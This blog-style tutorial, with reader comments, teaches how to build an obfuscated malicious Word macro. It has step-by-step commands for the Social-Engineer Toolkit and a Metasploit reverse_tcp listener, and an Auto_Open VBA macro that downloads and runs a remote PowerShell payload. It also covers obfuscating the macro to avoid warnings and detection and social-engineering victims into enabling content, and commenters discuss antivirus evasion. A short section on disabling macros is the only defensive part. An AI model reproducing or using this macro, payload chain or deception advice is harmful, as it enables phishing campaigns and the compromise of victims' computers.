How To: Create & Obfuscate a Virus Inside of a Microsoft Word Document

Create & Obfuscate a Virus Inside of a Microsoft Word Document

When performing something such as a mass mailer attack on a company, sending executables usually isn't the best option. That's why, in this tutorial, I'll be teaching you how to code a VBA script macro into a Word document in order to compromise a system. Combined with a little social engineering, this can be a very effective technique.

Bonus: There's a really nice PDF of this post thanks to TRT (who has some really well-written tutorials by the way) in case you're having trouble with the formatting of this website.

Things You'll Need

  1. Microsoft Word
  2. The Social-Engineer Toolkit (preinstalled on Kali)
  3. Apache web server (preinstalled on Kali)
  4. The Metasploit Framework (also preinstalled on Kali)

Bonus: I'll be using the same technique I used in my previous tutorial to create and deliver the payload; so if you've read that, you can skip steps 1 and 2 below.

Step 1: Creating the Payload

We'll be using the Social-Engineer Toolkit to create our payload. In this case, PowerShell proves very useful. To open SET, type this in your console:

setoolkit

From there, type 1 for "social engineering attacks," then 9 for "powershell attack vectors," and, finally, 1 for "powershell alphanumeric shellcode injector."

Now you'll need to provide an LHOST. If you didn't already know, this is your attack machine's local IP address (so long as you're attacking over a local area network). To determine it, open a new terminal window and type in:

ifconfig

Scroll up to the top to find the interface that's connected to your network (in my case, that's "eth0"). Find what I've highlighted, "inet," and next to it you'll find your local IP address (in my case, it's 10.0.0.13). This is what you'll input for your LHOST.

Next, it'll prompt you to type in a "port for the reverse." It's referring to the LPORT. Usually, I use 4444 as it's a meterpreter convention, but you can use any port you want so long as you remember it.

Then it will prompt you if you want to "start the listener now." Type no; we'll do this manually later. For now we're done with SET.

Now we'll need to move that payload over to our Apache web server. To do so, open a terminal and type:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt

However, if you're still using Kali Linux 1 (not 2), use this command:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt

This is because, in Kali Linux version 2, the Apache root directory was moved to the "html" folder inside of /var/www/.

Now, simply type:

service apache2 start

And your web server should be started.

Step 2: Setting Up the Listener

Lastly, we need to set up a listener to wait for a meterpreter session. Fire up the Metasploit Framework by typing:

msfconsole

Once it loads, type:

use multi/handler

Now, you'll need to type a series of options, so I'll list them out for you:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.13
set LPORT 4444

Again, remember to change LHOST to your local IP address, and change LPORT if you used something other than 4444.

Finally, type exploit and hit enter to start the listener.

Step 3: Adding the Command to a Word Document

Now, you'll need to incorporate this command into your Word document:

Of course, replacing 10.0.0.13 with your local IP address. This PowerShell command will retrieve and execute the PowerShell payload that you generated in the first step.

To add it to a document, open Microsoft Word and create a new document called Evil.docm. Make sure "Macro-Enabled" is selected from the drop-down menu.

Next, on the View tab, click on "Macros" on the right-hand side.

It will prompt you to create a new macro, so type Auto_Open and click "Create." Also, make sure that the drop-down menu next to "Macros in:" has the name of your document selected, and not "All active templates and documents," because it may get confusing.

Now, you could just paste a simple VBA script such as:

Sub Auto_Open()
Dim exec As String
exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))"""
Shell (exec)
End Sub

(Note the double quotes in the PowerShell command; the escape character in Visual Basic is just typing the character twice.)

Now, the next part is optional, but adds compatibility with the auto-open feature in PowerPoint and Excel using the AutoOpen() and Workbook_Open() methods, respectively.

Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub

(Here's the un-obfuscated source code on Pastebin.)

This would work, however, from my testing, if you leave the code un-obfuscated, Microsoft Word provides an extra warning to the user which won't show up if the code is obfuscated:

Plus, anybody could easily glance at the macro for a second and tell that it is malicious. That's where obfuscation comes in.

Step 4: Obfuscating the VBA Script

To obfuscate the code, I'm going to be using the ChrW() function. This allows us to type ASCII character values instead of the actual characters themselves.

Converting each character into its ASCII value by hand would be very tedious, so I wrote a Java program (yeah, I know, I'm going to learn Python soon) to automate the process. Here's the Java source code on Pastebin.

You can use the program with this JAR file, but you can always compile and run the source code yourself if you want. Once you do, it will prompt you to input the un-obfuscated command. Type this:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))"

Again, replacing 10.0.0.13 with your own local IP address.

Once you click "OK," a dialog box with the obfuscated code will appear and the text will automatically be copied to your clipboard.

Now you can simply go back to your document's macro editor, select everything, and replace it with the generated VBA script.

Finally, you can save the macro and document and you're done. The next time the document is opened, the code will run and you will get a meterpreter session! Well... not quite...

The victim must first click "Enable Content." How might you convince them to do that? Enter social engineering.

Step 5: Social Engineering

Feel free to get creative on this last step; it's really just up to your imagination. That being said, I'll provide a few examples below:

The idea is to trick the victim into thinking that the "SECURITY WARNING" is not warning about possible malware, but rather that the document itself is "protected" or "secured." And, in the event of a mass mailer attack, chances are that at least one person will fall for that trick.

Bonus: How to Protect Yourself from This Type of Attack

Open word and click File to bring up this menu. Then choose Options.

On the Left, navigate to the Trust Center tab, then click Trust Center Settings.

Finally, go to the Macro Settings tab and select "Disable all macros without notification".

And there you go! Now you don't have to worry about these types of attacks.
(Thanks to iTeV Who? for his comment asking about how to do this.)

Final Notes

I used pretty simple variable names (such as first, second, third, and last) in my obfuscation program, so I recommend that you replace them with more complex names and move the "first =" lines around to make it harder for someone else to comprehend.

Also, to combat some formatting issues, I used pictures instead of text in some places and added Pastebin links. Leave a comment if you want me to keep doing this or if you'd rather me do something else; I appreciate any feedback.

Alright, that's it. Thanks for reading my second post, and happy hacking!

39 Comments

Awesome tutorial in good quality ;)
Maybe you could provide a PDF :)

Thanks for the compliment!
Also, I never thought about making a PDF, that sounds like a really good idea.

I just love PDFs :D
Easy way to look for a specific attack in my own little archive :)

I like how you incorporated your Java skills into this. It shows that thinking outside the box is what really gets you to places. Lovely how-to that I'll probably be coming back to.

TRT

I'm glad you liked it!

Alright, so I made a nice PDF of this post for whoever needs it. I think it deserves a PDF to be remembered (and to refer back to it, of course).

TRT

Thanks ;)
Good to know that I am not the only one who is loving PDFs :D

Much appreciated, that means a lot to me as a new member of null-byte.

Thanks..
Is this exploit can be used for MS Word 2003, 2007, and 2010?

I've only tested it with MS Word 2013, but I'm almost certain it will work with all versions of MS Word (besides the OS X versions of course).

Very well done, something I have wondered about for a long time.

Cheers,
Washu

Very good tutorial, thanks sir,waiting for more interesting tutorial

Thank you . really good tutorial i enjoyed .

how can i bypass AV detection . when i open document Av detects . i think because of autorun macro ?? how can i bypass Ms exploits (macro) from AV's .

What AV are you using? Let me know so I can do some more testing.

Because I'm limited to just one computer with MS Word in my own testing, I used windows defender, removed the personal data (such as the author) from the obfuscated malicious document, uploaded it to Dropbox and the downloaded it again. When I opened it I didn't get any notification from windows defender, only the 'Security Warning' from MS Word that I showed in the article.

Also, I uploaded the document used in this tutorial to nodistribute.com and it recieved a 0/35:

Still, this could differ in real-life testing so if you find that it gets caught, send me a message.

Its a very nice and detailed tutorial!
But I wonder, How can me and others protect from this attack?

Very good question, something I should've addressed in the article. Here's how to completely disable macros in word, making this kind of attack useless against you:

Open word and click File to bring up this menu. Then choose Options.

On the Left, navigate to the Trust Center tab, then click Trust Center Settings.

Finally, go to the Macro Settings tab and select "Disable all macros without notification".

And there you go! Now you don't have to worry about these types of attacks.

P.S. Thanks for your comment :)

Thank you! Maybe you could add this part in the main tutorial?

Update: Did it! (Sorry for the delay)

Is this file download able anyhow? and it wont get me infected

If you're asking for the file I used in this tutorial, I uploaded it to dropbox here. It won't infect you because I used 0.0.0.0 as the IP, so the meterpreter session will not connect to any machine.

cool.......

Just had to comment again to say that I'm very impressed by the completeness of your replies, very complete and comprehensive, I can really see your dedication to quality. Thank you and can't wait for more tutorials :)

Cheers,
Washu

I agree as well. I think your persistently sophisticated expositions are impeccable and deserve to be commended (what a mouthful, sorry). You should add the PDF to the main post to spread it further among readers.

TRT

Just updated the post!
Seriously, I really appreciate your comment and commitment to my post, thanks :)

Thanks Washu!

I've really only just started learning about computer security, so I want to share the things I've learned or invented in my research to help anybody who's on my same quest for knowledge. I really appreciate your feedback and I always like to hear good things from my readers.

Thanks again,
~ Code

Thanks for you reply ,

your are sound like pro , i use metasploit macro exploit in ms word , all are fine but when i open that word doc in windows pc that was easily detected by Microsoft Security Essentials . (it detects when macro executes)

but when i scan that doc using AV or virus total looks fine but if i execute . :(

so did you know any solution . (like i need edit macro or ?? )

I'll go test this on another computer and see if I can replicate your problem, and if I find a solution I'll be sure to update this comment.

A very helpful and knowledgeable tutorial. Well done. I'll definitely refer back to this in the future :)

Can't wait to read more of your tutorials. Thank you!

Rad! Such a well written article, so detailed!!! :)

When I type in

mv /root /. set/reports/powershell /x86powershellinjection. txt/var/WWW/html/payload. txt it says missing destination file operand after /root/...

The error is in your syntax. '/.' is wrong: '/' means the top directory and '.' means the current directory. It will not be able to interpret contradicting statements.

EDIT: Actually you're right, my logic was inaccurate, it does mean the top directory. And I agree with Code below.

TRT

I think you're just missing the space between x86_powershell_injection.txt and /var/www

I am not quite sure what is wrong here...

I am able to manually install a meterpreter no problems, and I am able to connect to xx.xx.xx.xx/payload.txt from target computer, yet the powershell is not working. I have tried running the powershell without using Word, doesn't work either. Just sort of runs and then nothing...

Don't really know what else to try... Help would be appreciated! Awesome article btw :D

Hi, does someone think they would be able to compile all this tutorial into a ruby/ python script for metasploit?

I LOVE THIS SITE, I REALLY APPRECIATE YOUR EFFORTS ; GOD BLESS YOU ALWAYS,

r3G@RdS :
m!CH3L

Dear, what if we need to download & RUN an Execute File instead of a Powershell ??? what will be the code then ??? :)

Hi Michal,
Send a message and I will suggest some vba code for that.

This and the previous tutorials have been really helpful, thank you for taking the time, and especially for making them so clear.

Andy

Share Your Thoughts

  • Hot
  • Latest